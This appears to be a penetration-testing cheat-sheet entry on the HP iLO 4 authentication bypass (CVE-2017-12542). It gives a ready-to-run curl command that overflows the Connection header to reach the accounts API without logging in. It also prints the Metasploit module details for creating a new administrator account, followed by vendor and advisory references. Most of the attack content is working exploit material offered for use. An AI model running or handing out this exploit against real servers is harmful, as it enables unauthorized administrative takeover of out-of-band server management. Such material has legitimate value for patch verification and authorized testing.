HP iLO 4 Authentication Bypass
HP iLO 4 (< 2.53) authentication bypass thanks to a buffer overflow.
Description
Using the following header with any HTTP request should bypass the authentication:
Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Example:
curl -k -i -H "Connection: $(python -c 'print "A"*29')" https://<IP ADDRESS>/rest/v1/AccountService/Accounts
Apparently, you might also get an RCE from this vulnerability as stated in this article: https://github.com/airbus-seclab/ilo4_toolbox.
Exploit
The following exploits uses this vulnerability to create a new admin user for the web interface.
Metasploit Module
msf > info auxiliary/admin/hp/hp_ilo_create_admin_account
Name: HP iLO 4 1.00-2.50 Authentication Bypass Administrator Account Creation
Module: auxiliary/admin/hp/hp_ilo_create_admin_account
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2017-08-24
Provided by:
Fabien Perigaud <fabien.perigaud@synacktiv[dot]com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD ZVDlDjNTfFnY yes Password for the new account
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The target address
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
USERNAME lCxA6rlF yes Username for the new account
VHOST no HTTP server virtual host
Description:
This module exploits an authentication bypass in HP iLO 4 1.00 to
2.50, triggered by a buffer overflow in the Connection HTTP header
handling by the web server. Exploiting this vulnerability gives full
access to the REST API, allowing arbitrary accounts creation.
References:
https://cvedetails.com/cve/CVE-2017-12542/
http://www.securityfocus.com/bid/100467
https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_us
https://www.synacktiv.com/posts/exploit/hp-ilo-talk-at-recon-brx-2018.html
Standalone Python
Source: exploit-db.com/exploits/44005/